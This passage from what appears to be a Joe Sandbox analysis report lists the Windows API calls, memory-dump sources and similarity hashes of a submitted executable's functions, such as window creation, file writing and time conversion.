                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
